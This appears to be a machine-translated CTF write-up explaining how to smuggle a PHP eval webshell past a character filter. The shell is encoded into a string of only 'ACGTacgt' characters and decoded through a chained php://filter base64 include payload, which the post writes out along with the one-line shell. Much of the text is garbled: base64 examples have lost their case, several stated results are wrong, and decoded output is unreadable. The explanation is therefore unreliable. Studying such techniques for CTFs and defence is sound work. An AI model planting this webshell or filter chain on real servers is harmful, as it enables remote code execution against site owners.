wonderful webshell skills

Posted by santillano at 2020-03-21

Looking at a web problem of xdctf some time ago, I found a very strange way to construct webshell.

Base64 one sentence Trojan

The general meaning of the topic is to allow inclusion, but to limit the characters used. Only eight characters of 'ACGTACGT' are allowed.

Emmm, as I saw for the first time, I feel that this can't construct webshell at all. If it can be made out, I will eat it live Ice cream.

No nonsense, the principle is as follows:

First, roughly speaking, any string composed of {a-z|a-z|0-9| + | /} (if it is not a multiple of 4, it can be completed with '='), if it is a multiple of 4, it can be used as Base64 decoding material. When base64decode, the original string will contain characters outside the character set. For example:

Base64 decoding of string AAAA:

The result is I, some of it is garbled, but it doesn't matter, because at least one extra character I can be used is generated

i�� i

If it is a hash code like MD5, with one more letter, the whole string after encoding will be totally different, but Base64 is different.

Base64 encoding is a representation of binary data based on 64 printable characters. Since the 6th power of 2 is equal to 64, every 6 bits is a unit, corresponding to a printable character. Three bytes have 24 bits, corresponding to four Base64 units, that is, three bytes can represent four printable characters. That is to say, after three bytes are Base64 encoded, there are four bytes. Four bytes are decoded into three bytes.

Therefore, Base64 has a feature that it takes four bits as a unit, and multiple units are combined for multiple decryptions. The result is the same as the combination order. Another example:

The encoding result of abcbc123 is ywjqujdmtiz. We separate the encrypted strings into four groups: ywjj (ABC), qujd (ABC), mtiz (123), and combine them into mtizywjjjqujd:


The order of 123 and ABC is reversed.

123 abcABC

Another feature of Base64 is that it will automatically discard the characters that do not meet the requirements. If the base64 string to be decrypted includes illegal characters, that is, it is not in the set {a-z| a-z| 0-9| + | /}, and it is not the end equal sign character. It will be automatically discarded, another example:

PS: note that py version is 2.7

The decryption result of AAAA is I

aaaa i��

The decryption result of III is ﹐ 0

iiii �(�

If we repeat the decryption result of AAAA four times, then decrypt

aaaa iiii

From the above two examples, what dirty skills can get?

Three background knowledge:

① Encoding and decoding are not the only correspondence, that is to say, the letter A may be decoded by Base64 through different combinations of other characters. (the combination type is much more than the legal character type of Base64)

② The decoded characters take four bits as a unit, and multiple units are combined to decrypt for many times. The result is the same as the combination order.

③ Our sentence <? PHP @ Eval ($_post [a]);? > can be obtained by decrypting another string. We assume that the string number one can be obtained by decrypting the string number two, and this sequence is not unique. It is possible for us to find a string of characters composed of only eight characters of ACGTACGT. After n times of decryption, this string of characters turns out to be our one sentence Trojan horse. Of course, in this process, make sure to work in groups of four, otherwise the order will be disordered.

<?php @eval($_POST[a]);?> acgtACGT

Then attach the python script of Wang Yihang:

I added a lot of comments, and then we started to analyze from the main function step by step:

First, Base64 chars is output, which is defined in the previous Base64 chars = string. Letters + string. Digits + "+ /". Base64 string that may be used in addition to '='. Then tables = enumu tables (set (chars)) takes the eight characters that can be used into the enumu tables() function.

base64_chars base64_chars = string.letters + string.digits + "+/" tables = enmu_tables(set(chars))

We follow the function of enmu_tables(), which brings eight characters we can use into the function of enmu_tables(), combines four bits into a group, and then decodes Base64 to generate a list. The key value of the list is the legal number (with two illegal numbers destined to be abandoned) that can be generated by all ACGTACGT combinations, and the value is the 'ACGTACGT' that generates the legal number ’Four character combination.

enmu_tables() enmu_table() acgtACGT

Do you remember a chestnut mentioned before?

AAAA decoding generates I, so when it is first generated, the key value of list is I, and the value value is' AAAA '

aaaa i��

After all the combinations

We've got 26 characters, and the four bit string that these 26 characters can recombine is the 26th power of four~

In the last step, we got 57

Recycle once

We've got 64. It's all Base64 legal characters

At this time, we have three tables in our hands, one key (accompanied by two garbage characters destined to be thrown away) corresponding to four value. At this time, we can separate the characters in a sentence password and go to the last table (64 keys) one by one to find a 4-bit string composed of 57 characters generated by the second cycle. After finding it, go to the second table and replace the current characters with the 4-bit combination of the 26 bit string obtained in the first cycle. Then go to the first table and find the 4-bit string composed of the initial 8-bit character;

In total, it replaced three times, and because base64encode was added to input a sentence, the last payload was:

Include (PHP: / / filter / convert. Base64 decode / resource = PHP: / / filter / convert. Base64 decode / resource = PHP: / / filter / convert. Base64 decode / resource = PHP: / / filter / convert. Base64 decode / resource = PHP: / / filter / convert. Base64 decode / resource = [our ACGTACGT portfolio]);

include(php://filter/convert.base64-decode/resource=php://filter/convert.base64-decode/resource=php://filter/convert.base64-decode/resource=php://filter/convert.base64-decode/resource= 【我们的acgtACGT组合】)

The generated payload, stored in a file named 'ACGTACGT', looks like this:

It's so long, I won't post it

One more thing to note in that script is:

If the length is not a multiple of 4, the equal sign will be used by default according to the base64 coding principle to make up a multiple of 4.


There are also some wonderful ideas of webshell from master P. please write them later Soon GG, you can also pay attention to the author's blog, click to read the original visit.

If you have any questions, you can add groups to communicate with the author

If you want to contribute, you can contact the group leader in groups